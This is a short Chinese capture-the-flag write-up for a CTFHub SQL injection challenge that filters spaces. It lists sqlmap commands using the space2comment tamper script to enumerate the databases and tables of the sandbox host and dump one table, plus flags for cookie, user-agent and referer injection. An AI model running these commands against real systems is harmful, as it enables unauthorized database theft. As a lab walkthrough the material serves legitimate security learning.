題目:

圖1. 題目截圖
解題思路:
遇到sql注入問題統(tǒng)一用sqlmap去解決,基礎(chǔ)的(字符型,整型,時(shí)間,布爾等)均可參考我上篇文章去解決:http://www.itdecent.cn/p/05b33402afe9
本題難點(diǎn):
但是如果按照普通的命令去解答此題,就會(huì)發(fā)現(xiàn)找不到表。
因此我們要加上繞過命令 --tamper=space2comment
- Step1
python sqlmap.py -u "http://challenge-0f77d2a1347c4a5e.sandbox.ctfhub.com:10800/?id=1" --batch --dbs --tamper=space2comment
Step2
python sqlmap.py -u "http://challenge-0f77d2a1347c4a5e.sandbox.ctfhub.com:10800/?id=1" --batch --tables -D sqli --tamper=space2commentStep3
python sqlmap.py -u "http://challenge-0f77d2a1347c4a5e.sandbox.ctfhub.com:10800/?id=1" --batch --dump -T gdjytroshe -D sqli --tamper=space2comment
注意:
如果出現(xiàn)感覺值不對,或者是<blank>的情況,可以把對應(yīng)處理的日志給刪除了,在跑一遍。

這是出現(xiàn)了錯(cuò)誤的圖片

重新再跑了一遍正確的圖片
其他類型情況:
1. cookie型:
補(bǔ)充在命令里面補(bǔ)充語句:
--cookie "id=1;" --level 3
2. user-agent(ua)型:
--user-agent "id=1"
3. reffer型
--refer "id=1"